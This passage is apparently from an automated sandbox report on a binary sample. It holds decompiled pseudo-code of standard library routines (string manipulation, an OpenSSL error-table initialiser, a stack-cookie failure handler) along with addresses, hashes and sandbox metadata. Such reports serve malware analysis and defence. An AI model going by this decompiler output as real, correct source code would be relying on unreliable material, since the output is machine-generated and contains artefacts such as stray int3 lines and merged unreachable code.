								E00415D50(_t195, __ecx, _t247, __ecx, _v12, 0);
								_t200 = _a20;
								_t226 = _a16;
								_t134 = _a8;
							}
							if(_t251 == _t195) {
								_t196 = _a20;
								__eflags = _t196 - _t134;
								if(_t196 > _t134) {
									__eflags = _t226 - _t247;
									if(_t226 > _t247) {
										_t203 = _t247 + _t134;
										_a4 = _t203;
										__eflags = _t203 - _t226;
										if(_t203 > _t226) {
											_t204 =  *((intOrPtr*)(_t251 + 0x14));
											__eflags = _t204 - 8;
											if(_t204 < 8) {
												_a12 = _t251;
											} else {
												_a12 =  *_t251;
												_t196 = _a20;
											}
											__eflags = _t204 - 8;
											if(_t204 < 8) {
												_t205 = _t251;
											} else {
												_t205 =  *_t251;
											}
											E0040B600(_t205 + _t247 * 2, _a12 + _t226 * 2, _t134);
											_t207 =  *((intOrPtr*)(_t251 + 0x14));
											__eflags = _t207 - 8;
											if(_t207 < 8) {
												_t137 = _t251;
											} else {
												_t137 =  *_t251;
											}
											__eflags = _t207 - 8;
											if(_t207 < 8) {
												_t208 = _t251;
											} else {
												_t208 =  *_t251;
											}
											_a20 = _a4 + _a4;
											E0040B600(_t208 + (_t247 + _t196) * 2, _a4 + _a4 + _t137, _v8);
											_t140 =  *((intOrPtr*)(_t251 + 0x14));
											__eflags = _t140 - 8;
											if(_t140 < 8) {
												_t231 = _t251;
											} else {
												_t231 =  *_t251;
											}
											__eflags = _t140 - 8;
											if(_t140 < 8) {
												_t210 = _t251;
											} else {
												_t210 =  *_t251;
											}
											_push(_t196 - _a8);
											_t144 = _a16 + _t196;
											_t211 = _t210 + _a20;
											__eflags = _t210 + _a20;
										} else {
											_t149 =  *((intOrPtr*)(_t251 + 0x14));
											__eflags = _t149 - 8;
											if(_t149 < 8) {
												_t235 = _t251;
											} else {
												_t235 =  *_t251;
											}
											__eflags = _t149 - 8;
											if(_t149 < 8) {
												_t213 = _t251;
											} else {
												_t213 =  *_t251;
											}
											E0040B600(_t213 + (_t247 + _t196) * 2, _t235 + _a4 * 2, _v8);
											_t153 =  *((intOrPtr*)(_t251 + 0x14));
											__eflags = _t153 - 8;
											if(_t153 < 8) {
												_t231 = _t251;
											} else {
												_t231 =  *_t251;
											}
											__eflags = _t153 - 8;
											if(_t153 < 8) {
												_push(_t196);
												_t144 = _a16 - _a8 + _t196;
												_t211 = _t251 + _t247 * 2;
											} else {
												_push(_t196);
												_t144 = _a16 - _a8 + _t196;
												_t211 =  *_t251 + _t247 * 2;
											}
										}
									} else {
										_t158 =  *((intOrPtr*)(_t251 + 0x14));
										__eflags = _t158 - 8;
										if(_t158 < 8) {
											_t237 = _t251;
										} else {
											_t237 =  *_t251;
										}
										__eflags = _t158 - 8;
										if(_t158 < 8) {
											_t217 = _t251;
										} else {
											_t217 =  *_t251;
										}
										E0040B600(_t217 + (_t247 + _t196) * 2, _t237 + (_a8 + _t247) * 2, _v8);
										_t163 =  *((intOrPtr*)(_t251 + 0x14));
										__eflags = _t163 - 8;
										if(_t163 < 8) {
											_t231 = _t251;
										} else {
											_t231 =  *_t251;
										}
										__eflags = _t163 - 8;
										if(_t163 < 8) {
											_t144 = _a16;
											_push(_t196);
											_t211 = _t251 + _t247 * 2;
										} else {
											_t144 = _a16;
											_push(_t196);
											_t211 =  *_t251 + _t247 * 2;
										}
									}
									_t232 = _t231 + _t144 * 2;
								} else {
									_t164 =  *((intOrPtr*)(_t251 + 0x14));
									__eflags = _t164 - 8;
									if(_t164 < 8) {
										_t221 = _t251;
									} else {
										_t221 =  *_t251;
									}
									__eflags = _t164 - 8;
									if(_t164 < 8) {
										_t165 = _t251;
									} else {
										_t165 =  *_t251;
									}
									E0040B600(_t165 + _t247 * 2, _t221 + _t226 * 2, _t196);
									_t167 =  *((intOrPtr*)(_t251 + 0x14));
									__eflags = _t167 - 8;
									if(_t167 < 8) {
										_t240 = _t251;
									} else {
										_t240 =  *_t251;
									}
									__eflags = _t167 - 8;
									if(_t167 < 8) {
										_t223 = _t251;
									} else {
										_t223 =  *_t251;
									}
									_push(_v8);
									_t232 = _t240 + (_a8 + _t247) * 2;
									_t211 = _t223 + (_t247 + _t196) * 2;
								}
								E0040B600(_t211, _t232);
							} else {
								_t171 =  *((intOrPtr*)(_t251 + 0x14));
								if(_t171 < 8) {
									_a4 = _t251;
								} else {
									_a4 =  *_t251;
								}
								if(_t171 < 8) {
									_t241 = _t251;
								} else {
									_t241 =  *_t251;
								}
								_t172 = _v8;
								if(_v8 != 0) {
									E004205A0(_t241 + (_t247 + _t200) * 2, _a4 + (_a8 + _t247) * 2, _t172 + _t172);
									_t195 = _a12;
									_t259 = _t259 + 0xc;
								}
								if( *((intOrPtr*)(_t195 + 0x14)) >= 8) {
									_t195 =  *_t195;
								}
								if( *((intOrPtr*)(_t251 + 0x14)) < 8) {
									_t224 = _t251;
								} else {
									_t224 =  *_t251;
								}
								_t173 = _a20;
								if(_a20 != 0) {
									E0042D8D0(_t224 + _t247 * 2, _t195 + _a16 * 2, _t173 + _t173);
								}
							}
							_t212 = _v12;
							 *(_t251 + 0x10) = _t212;
							if( *((intOrPtr*)(_t251 + 0x14)) < 8) {
								_t146 = _t251;
								__eflags = 0;
								 *((short*)(_t146 + _t212 * 2)) = 0;
								return _t146;
							} else {
								 *((short*)( *_t251 + _t212 * 2)) = 0;
								return _t251;
							}
						}
					}
				}
			}

0x00414920
0x00414923
0x00414927
0x0041492a
0x0041492d
0x00414932
0x00414c3d
0x00414c3d
0x00414c42
0x00414c47
0x00414c48
0x00414c49
0x00414c4a
0x00414c4b
0x00414c4c
0x00414c4d
0x00414c4e
0x00414c4f
0x00414c53
0x00414938
0x00414938
0x0041493f
0x00414944
0x00000000
0x0041494a
0x0041494e
0x00414951
0x00414957
0x0041495d
0x00414966
0x0041496b
0x00414972
0x00414977
0x0041497c
0x0041497f
0x00414982
0x00414c33
0x00414c38
0x00000000
0x00414988
0x0041498b
0x0041498e
0x00414990
0x00414996
0x00414999
0x0041499c
0x004149a5
0x004149aa
0x004149ad
0x004149b0
0x004149b0
0x004149b5
0x00414a36
0x00414a39
0x00414a3b
0x00414a94
0x00414a96
0x00414af9
0x00414afc
0x00414aff
0x00414b01
0x00414b6c
0x00414b6f
0x00414b72
0x00414b7e
0x00414b74
0x00414b76
0x00414b79
0x00414b79
0x00414b81
0x00414b84
0x00414b8a
0x00414b86
0x00414b86
0x00414b86
0x00414b96
0x00414b9b
0x00414ba1
0x00414ba4
0x00414baa
0x00414ba6
0x00414ba6
0x00414ba6
0x00414bac
0x00414baf
0x00414bb5
0x00414bb1
0x00414bb1
0x00414bb1
0x00414bbf
0x00414bca
0x00414bcf
0x00414bd5
0x00414bd8
0x00414bde
0x00414bda
0x00414bda
0x00414bda
0x00414be0
0x00414be3
0x00414be9
0x00414be5
0x00414be5
0x00414be5
0x00414bf0
0x00414bf4
0x00414bf6
0x00414bf6
0x00414b03
0x00414b03
0x00414b06
0x00414b09
0x00414b0f
0x00414b0b
0x00414b0b
0x00414b0b
0x00414b11
0x00414b14
0x00414b1a
0x00414b16
0x00414b16
0x00414b16
0x00414b2b
0x00414b30
0x00414b36
0x00414b39
0x00414b3f
0x00414b3b
0x00414b3b
0x00414b3b
0x00414b41
0x00414b44
0x00414b61
0x00414b62
0x00414b64
0x00414b46
0x00414b4e
0x00414b4f
0x00414b51
0x00414b51
0x00414b44
0x00414a98
0x00414a98
0x00414a9b
0x00414a9e
0x00414aa4
0x00414aa0
0x00414aa0
0x00414aa0
0x00414aa6
0x00414aa9
0x00414aaf
0x00414aab
0x00414aab
0x00414aab
0x00414ac2
0x00414ac7
0x00414acd
0x00414ad0
0x00414ad6
0x00414ad2
0x00414ad2
0x00414ad2
0x00414ad8
0x00414adb
0x00414aeb
0x00414af0
0x00414af1
0x00414add
0x00414adf
0x00414ae2
0x00414ae3
0x00414ae3
0x00414adb
0x00414bf9
0x00414a3d
0x00414a3d
0x00414a40
0x00414a43
0x00414a49
0x00414a45
0x00414a45
0x00414a45
0x00414a4b
0x00414a4e
0x00414a54
0x00414a50
0x00414a50
0x00414a50
0x00414a5d
0x00414a62
0x00414a68
0x00414a6b
0x00414a71
0x00414a6d
0x00414a6d
0x00414a6d
0x00414a73
0x00414a76
0x00414a7c
0x00414a78
0x00414a78
0x00414a78
0x00414a81
0x00414a86
0x00414a8c
0x00414a8c
0x00414bfc
0x004149b7
0x004149b7
0x004149bd
0x004149c6
0x004149bf
0x004149c1
0x004149c1
0x004149cc
0x004149d2
0x004149ce
0x004149ce
0x004149ce
0x004149d4
0x004149d9
0x004149f1
0x004149f6
0x004149f9
0x004149f9
0x00414a00
0x00414a02
0x00414a02
0x00414a08
0x00414a0e
0x00414a0a
0x00414a0a
0x00414a0a
0x00414a10
0x00414a15
0x00414a29
0x00414a2e
0x00414a15
0x00414c08
0x00414c0b
0x00414c0f
0x00414c23
0x00414c25
0x00414c29
0x00414c30
0x00414c11
0x00414c16
0x00414c20
0x00414c20
0x00414c0f
0x00414982
0x00414944

APIs

_memmove.LIBCMT ref: 004149F1

Strings

string too long, xrefs: 00414C33
invalid string position, xrefs: 00414C3D

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00417D50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00417D50(signed int __ebx, intOrPtr* __ecx, signed int _a4, signed int _a8, intOrPtr* _a12, signed int _a16) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v20;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t64;
				signed int _t67;
				signed int _t69;
				signed int _t71;
				signed int _t73;
				signed int _t76;
				intOrPtr _t82;
				intOrPtr _t88;
				intOrPtr* _t96;
				intOrPtr* _t99;
				signed int _t101;
				intOrPtr _t102;
				signed int _t105;
				signed int _t109;
				signed int _t113;
				intOrPtr _t118;
				intOrPtr* _t120;
				void* _t122;
				signed int _t123;
				intOrPtr* _t124;
				intOrPtr* _t125;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr _t131;
				void* _t132;
				intOrPtr* _t142;
				signed int _t144;
				void* _t151;

				_t101 = __ebx;
				_t130 = _a12;
				_t142 = __ecx;
				if(_t130 == 0) {
					L13:
					_t64 =  *(_t142 + 0x10);
					_t109 = _a4;
					__eflags = _t64 - _t109;
					if(__eflags < 0) {
						_push("invalid string position");
						E0044F26C(__eflags);
						goto L44;
					} else {
						_t122 = _t64 - _t109;
						_t109 = _a16;
						_push(_t101);
						_t105 = _a8;
						__eflags = _t122 - _t105;
						_t101 =  <  ? _t122 : _t105;
						_t73 = _t64 - _t101;
						_a8 = _t73;
						__eflags = (_t73 | 0xffffffff) - _t109 - _a8;
						if(__eflags <= 0) {
							L44:
							_push("string too long");
							E0044F23E(__eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t101);
							_push(_t142);
							_push(_t130);
							_t131 = _v20;
							__eflags =  *((intOrPtr*)(_t109 + 0x10)) - _t131;
							_t132 =  <  ?  *((void*)(_t109 + 0x10)) : _t131;
							__eflags =  *((intOrPtr*)(_t109 + 0x14)) - 8;
							if( *((intOrPtr*)(_t109 + 0x14)) >= 8) {
								_t109 =  *_t109;
							}
							_t102 = _a12;
							__eflags = _t132 - _t102;
							_t144 =  <  ? _t132 : _t102;
							__eflags = _t144;
							if(_t144 == 0) {
								L51:
								_t67 = 0;
								__eflags = 0;
							} else {
								_t120 = _a8;
								while(1) {
									__eflags =  *_t109 -  *_t120;
									if( *_t109 !=  *_t120) {
										break;
									}
									_t109 = _t109 + 2;
									_t120 = _t120 + 2;
									_t144 = _t144 - 1;
									__eflags = _t144;
									if(_t144 != 0) {
										continue;
									} else {
										goto L51;
									}
									goto L52;
								}
								_t71 =  *_t109 & 0x0000ffff;
								__eflags = _t71 -  *_t120;
								asm("sbb eax, eax");
								_t67 = (_t71 & 0xfffffffe) + 1;
							}
							L52:
							__eflags = _t67;
							if(_t67 != 0) {
								L57:
								return _t67;
							} else {
								__eflags = _t132 - _t102;
								if(_t132 >= _t102) {
									__eflags = _t132 - _t102;
									_t63 = _t132 != _t102;
									__eflags = _t63;
									_t67 = 0 | _t63;
									goto L57;
								} else {
									_t69 = _t67 | 0xffffffff;
									__eflags = _t69;
									return _t69;
								}
							}
						} else {
							_t123 = _t122 - _t101;
							_v12 = _t123;
							__eflags = _t109 - _t101;
							if(_t109 < _t101) {
								_t88 =  *((intOrPtr*)(_t142 + 0x14));
								__eflags = _t88 - 8;
								if(_t88 < 8) {
									_a8 = _t142;
								} else {
									_a8 =  *_t142;
									_t130 = _a12;
								}
								__eflags = _t88 - 8;
								if(_t88 < 8) {
									_v8 = _t142;
								} else {
									_v8 =  *_t142;
								}
								__eflags = _t123;
								if(_t123 != 0) {
									E004205A0(_v8 + (_a4 + _t109) * 2, _a8 + (_a4 + _t101) * 2, _t123 + _t123);
									_t130 = _a12;
									_t151 = _t151 + 0xc;
									_t109 = _a16;
								}
							}
							__eflags = _t109;
							if(_t109 != 0) {
								L26:
								_a8 = _t109 - _t101 +  *(_t142 + 0x10);
								_t76 = E00415D50(_t101, _t142, _t130, _t142, _t109 - _t101 +  *(_t142 + 0x10), 0);
								__eflags = _t76;
								if(_t76 != 0) {
									_t113 = _a16;
									__eflags = _t101 - _t113;
									if(_t101 >= _t113) {
										_t107 = _a4;
									} else {
										_t82 =  *((intOrPtr*)(_t142 + 0x14));
										__eflags = _t82 - 8;
										if(_t82 < 8) {
											_t125 = _t142;
										} else {
											_t125 =  *_t142;
										}
										__eflags = _t82 - 8;
										if(_t82 < 8) {
											_a12 = _t142;
										} else {
											_a12 =  *_t142;
										}
										_t107 = _a4;
										E0040B600(_a12 + (_a4 + _t113) * 2, _t125 + (_a4 + _t101) * 2, _v12);
										_t113 = _a16;
										_t151 = _t151 + 4;
									}
									__eflags =  *((intOrPtr*)(_t142 + 0x14)) - 8;
									if( *((intOrPtr*)(_t142 + 0x14)) < 8) {
										_t124 = _t142;
									} else {
										_t124 =  *_t142;
									}
									__eflags = _t113;
									if(_t113 != 0) {
										E0042D8D0(_t124 + _t107 * 2, _t130, _t113 + _t113);
									}
									E00414DF0(_t142, _a8);
								}
							} else {
								__eflags = _t101;
								if(_t101 != 0) {
									goto L26;
								}
							}
							return _t142;
						}
					}
				} else {
					_t118 =  *((intOrPtr*)(__ecx + 0x14));
					if(_t118 < 8) {
						_t96 = __ecx;
					} else {
						_t96 =  *__ecx;
					}
					if(_t130 < _t96) {
						goto L13;
					} else {
						if(_t118 < 8) {
							_t128 = _t142;
						} else {
							_t128 =  *_t142;
						}
						if(_t128 +  *(_t142 + 0x10) * 2 <= _t130) {
							goto L13;
						} else {
							if(_t118 < 8) {
								_t99 = _t142;
							} else {
								_t99 =  *_t142;
							}
							return E00414920(_t101, _t142, _t130 - _t99 >> 1, _t142, _a4, _a8, _t142, _t130 - _t99 >> 1, _a16);
						}
					}
				}
			}

0x00417d50
0x00417d58
0x00417d5b
0x00417d5f
0x00417db1
0x00417db1
0x00417db4
0x00417db7
0x00417db9
0x00417edf
0x00417ee4
0x00000000
0x00417dbf
0x00417dc1
0x00417dc3
0x00417dc6
0x00417dc7
0x00417dca
0x00417dcc
0x00417dcf
0x00417dd1
0x00417dd9
0x00417ddc
0x00417ee9
0x00417ee9
0x00417eee
0x00417ef3
0x00417ef4
0x00417ef5
0x00417ef6
0x00417ef7
0x00417ef8
0x00417ef9
0x00417efa
0x00417efb
0x00417efc
0x00417efd
0x00417efe
0x00417eff
0x00417f03
0x00417f04
0x00417f05
0x00417f06
0x00417f09
0x00417f0c
0x00417f10
0x00417f14
0x00417f16
0x00417f16
0x00417f18
0x00417f1b
0x00417f1f
0x00417f22
0x00417f24
0x00417f41
0x00417f41
0x00417f41
0x00417f26
0x00417f26
0x00417f30
0x00417f33
0x00417f36
0x00000000
0x00000000
0x00417f38
0x00417f3b
0x00417f3e
0x00417f3e
0x00417f3f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00417f3f
0x00417f55
0x00417f58
0x00417f5b
0x00417f60
0x00417f60
0x00417f43
0x00417f43
0x00417f45
0x00417f6a
0x00417f6e
0x00417f47
0x00417f47
0x00417f49
0x00417f65
0x00417f67
0x00417f67
0x00417f67
0x00000000
0x00417f4b
0x00417f4d
0x00417f4d
0x00417f52
0x00417f52
0x00417f49
0x00417de2
0x00417de2
0x00417de4
0x00417de7
0x00417de9
0x00417deb
0x00417dee
0x00417df1
0x00417dfd
0x00417df3
0x00417df5
0x00417df8
0x00417df8
0x00417e00
0x00417e03
0x00417e0c
0x00417e05
0x00417e07
0x00417e07
0x00417e0f
0x00417e11
0x00417e2e
0x00417e33
0x00417e36
0x00417e39
0x00417e39
0x00417e11
0x00417e3c
0x00417e3e
0x00417e48
0x00417e4f
0x00417e55
0x00417e5a
0x00417e5c
0x00417e5e
0x00417e61
0x00417e63
0x00417ea6
0x00417e65
0x00417e65
0x00417e68
0x00417e6b
0x00417e71
0x00417e6d
0x00417e6d
0x00417e6d
0x00417e73
0x00417e76
0x00417e7f
0x00417e78
0x00417e7a
0x00417e7a
0x00417e8a
0x00417e99
0x00417e9e
0x00417ea1
0x00417ea1
0x00417ea9
0x00417ead
0x00417eb3
0x00417eaf
0x00417eaf
0x00417eaf
0x00417eb5
0x00417eb7
0x00417ec2
0x00417ec7
0x00417ecf
0x00417ecf
0x00417e40
0x00417e40
0x00417e42
0x00000000
0x00000000
0x00417e42
0x00417edc
0x00417edc
0x00417ddc
0x00417d61
0x00417d61
0x00417d67
0x00417d6d
0x00417d69
0x00417d69
0x00417d69
0x00417d71
0x00000000
0x00417d73
0x00417d76
0x00417d7c
0x00417d78
0x00417d78
0x00417d78
0x00417d86
0x00000000
0x00417d88
0x00417d8b
0x00417d91
0x00417d8d
0x00417d8d
0x00417d8d
0x00417dae
0x00417dae
0x00417d86
0x00417d71

APIs

_memmove.LIBCMT ref: 00417E2E

Strings

string too long, xrefs: 00417EE9
invalid string position, xrefs: 00417EDF

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
Opcode Fuzzy Hash: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9

Uniqueness

Uniqueness Score: -1.00%

Function 004516A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004516A0(void* __ebx, void* __edi) {
				char* _t6;
				intOrPtr _t12;
				void* _t14;
				char* _t16;
				char** _t19;
				void* _t21;
				void* _t22;
				void* _t23;

				E004547A0(_t14, __edi, 5, 1, ".\\crypto\\err\\err.c", 0x244);
				_t22 = _t21 + 0x10;
				if( *0x50b6d4 != 0) {
					E004547A0(_t14, __edi, 6, 1, ".\\crypto\\err\\err.c", 0x24b);
					E004547A0(_t14, __edi, 9, 1, ".\\crypto\\err\\err.c", 0x24c);
					_t23 = _t22 + 0x20;
					__eflags =  *0x50b6d4;
					if( *0x50b6d4 != 0) {
						_push(__ebx);
						_push(__edi);
						_t12 = 1;
						_t16 = 0x5117e0;
						_t19 = 0x5113e4;
						do {
							__eflags =  *_t19;
							 *((intOrPtr*)(_t19 - 4)) = _t12;
							if(__eflags == 0) {
								_push(_t12);
								_t6 = E004C5D39(_t12, _t14, __eflags);
								_t23 = _t23 + 4;
								__eflags = _t6;
								if(_t6 != 0) {
									E004C5E00(_t16, _t6, 0x20);
									_t23 = _t23 + 0xc;
									_t16[0x1f] = 0;
									 *_t19 = _t16;
								}
								__eflags =  *_t19;
								if( *_t19 == 0) {
									 *_t19 = "unknown";
								}
							}
							_t19 =  &(_t19[2]);
							_t12 = _t12 + 1;
							_t16 =  &(_t16[0x20]);
							__eflags = _t19 - 0x5117d4;
						} while (_t19 <= 0x5117d4);
						 *0x50b6d4 = 0;
						return E004547A0(_t14, _t16, 0xa, 1, ".\\crypto\\err\\err.c", 0x26c);
					} else {
						return E004547A0(_t14, __edi, 0xa, 1, ".\\crypto\\err\\err.c", 0x24f);
					}
				} else {
					return E004547A0(_t14, __edi, 6, 1, ".\\crypto\\err\\err.c", 0x247);
				}
			}

0x004516ae
0x004516b3
0x004516bd
0x004516e4
0x004516f7
0x004516fc
0x004516ff
0x00451706
0x0045171f
0x00451721
0x00451722
0x00451727
0x0045172c
0x00451731
0x00451731
0x00451734
0x00451737
0x00451739
0x0045173a
0x0045173f
0x00451742
0x00451744
0x0045174a
0x0045174f
0x00451752
0x00451756
0x00451756
0x00451758
0x0045175b
0x0045175d
0x0045175d
0x0045175b
0x00451763
0x00451766
0x00451767
0x0045176a
0x0045176a
0x00451780
0x00451795
0x00451708
0x0045171e
0x0045171e
0x004516bf
0x004516d5
0x004516d5

Strings

unknown, xrefs: 0045175D
.\crypto\err\err.c, xrefs: 004516A5, 004516C4, 004516DB, 004516EE, 0045170D, 00451777

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID:
String ID: .\crypto\err\err.c$unknown
API String ID: 0-565200744
Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E

Uniqueness

Uniqueness Score: -1.00%

Function 0042A77E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E0042A77E(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v808;
				int _t9;
				intOrPtr _t14;
				signed int _t15;
				signed int _t17;
				signed int _t19;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr* _t30;
				intOrPtr* _t32;
				void* _t35;

				_t28 = __esi;
				_t27 = __edi;
				_t26 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t35 = _t23 -  *0x50ad20; // 0x84f4da2
				if(_t35 == 0) {
					asm("repe ret");
				}
				_t30 = _t32;
				_t9 = IsProcessorFeaturePresent(0x17);
				if(_t9 != 0) {
					_t23 = 2;
					asm("int 0x29");
				}
				 *0x510e38 = _t9;
				 *0x510e34 = _t23;
				 *0x510e30 = _t26;
				 *0x510e2c = _t22;
				 *0x510e28 = _t28;
				 *0x510e24 = _t27;
				 *0x510e50 = ss;
				 *0x510e44 = cs;
				 *0x510e20 = ds;
				 *0x510e1c = es;
				 *0x510e18 = fs;
				 *0x510e14 = gs;
				asm("pushfd");
				_pop( *0x510e48);
				 *0x510e3c =  *_t30;
				 *0x510e40 = _v0;
				 *0x510e4c =  &_a4;
				 *0x510d88 = 0x10001;
				_t14 =  *0x510e40; // 0x0
				 *0x510d44 = _t14;
				 *0x510d38 = 0xc0000409;
				 *0x510d3c = 1;
				 *0x510d48 = 1;
				_t15 = 4;
				 *((intOrPtr*)(0x510d4c + _t15 * 0)) = 2;
				_t17 = 4;
				_t24 =  *0x50ad20; // 0x84f4da2
				 *((intOrPtr*)(_t30 + _t17 * 0 - 8)) = _t24;
				_t19 = 4;
				_t25 =  *0x50ad24; // 0xf7b0b25d
				 *((intOrPtr*)(_t30 + (_t19 << 0) - 8)) = _t25;
				return E0042AB4B(_t19 << 0, "8\rQ");
			}

0x0042a77e
0x0042a77e
0x0042a77e
0x0042a77e
0x0042a77e
0x0042a77e
0x0042a784
0x0042a786
0x0042a786
0x0042ab89
0x0042ab93
0x0042ab9a
0x0042ab9e
0x0042ab9f
0x0042ab9f
0x0042aba1
0x0042aba6
0x0042abac
0x0042abb2
0x0042abb8
0x0042abbe
0x0042abc4
0x0042abcb
0x0042abd2
0x0042abd9
0x0042abe0
0x0042abe7
0x0042abee
0x0042abef
0x0042abf8
0x0042ac00
0x0042ac08
0x0042ac13
0x0042ac1d
0x0042ac22
0x0042ac27
0x0042ac31
0x0042ac3b
0x0042ac47
0x0042ac4b
0x0042ac57
0x0042ac5b
0x0042ac61
0x0042ac67
0x0042ac6b
0x0042ac71
0x0042ac82

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
___raise_securityfailure.LIBCMT ref: 0042AC7A

Strings

8Q, xrefs: 0042AC75

Memory Dump Source

Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: 8Q
API String ID: 3761405300-2096853525
Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45

Uniqueness

Uniqueness Score: -1.00%

Function 00413C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E00413C40(void* __ebx, intOrPtr* __ecx, void* __edi, intOrPtr _a4) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr* _t18;
				void* _t20;
				intOrPtr _t22;
				intOrPtr* _t25;
				intOrPtr* _t27;
				void* _t32;

				_t18 = __ecx;
				_t25 = __ecx;
				_push(__edi);
				_t22 = _a4;
				 *__ecx = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((intOrPtr*)(__ecx + 8)) = 0;
				if(_t22 == 0) {
					L4:
					return _t25;
				} else {
					_t36 = _t22 - 0xffffffff;
					if(_t22 > 0xffffffff) {
						_push("vector<T> too long");
						E0044F23E(__eflags);
						goto L6;
					} else {
						_t15 = E00423B4C(__ebx, _t20, _t22, _t36, _t22);
						_t32 = _t32 + 4;
						if(_t15 == 0) {
							L6:
							E0044F1BB(__eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t25);
							_t27 = _t18;
							_t14 =  *_t27;
							__eflags = _t14;
							if(_t14 != 0) {
								_t14 = L00422587(_t14);
								 *_t27 = 0;
								 *((intOrPtr*)(_t27 + 4)) = 0;
								 *((intOrPtr*)(_t27 + 8)) = 0;
							}
							return _t14;
						} else {
							 *_t25 = _t15;
							 *((intOrPtr*)(_t25 + 4)) = _t15;
							 *((intOrPtr*)(_t25 + 8)) = _t15 + _t22;
							E0042B420(_t15, 0, _t22);
							 *((intOrPtr*)(_t25 + 4)) =  *((intOrPtr*)(_t25 + 4)) + _t22;
							goto L4;
						}
					}
				}
			}

0x00413c40
0x00413c44
0x00413c46
0x00413c47
0x00413c4a
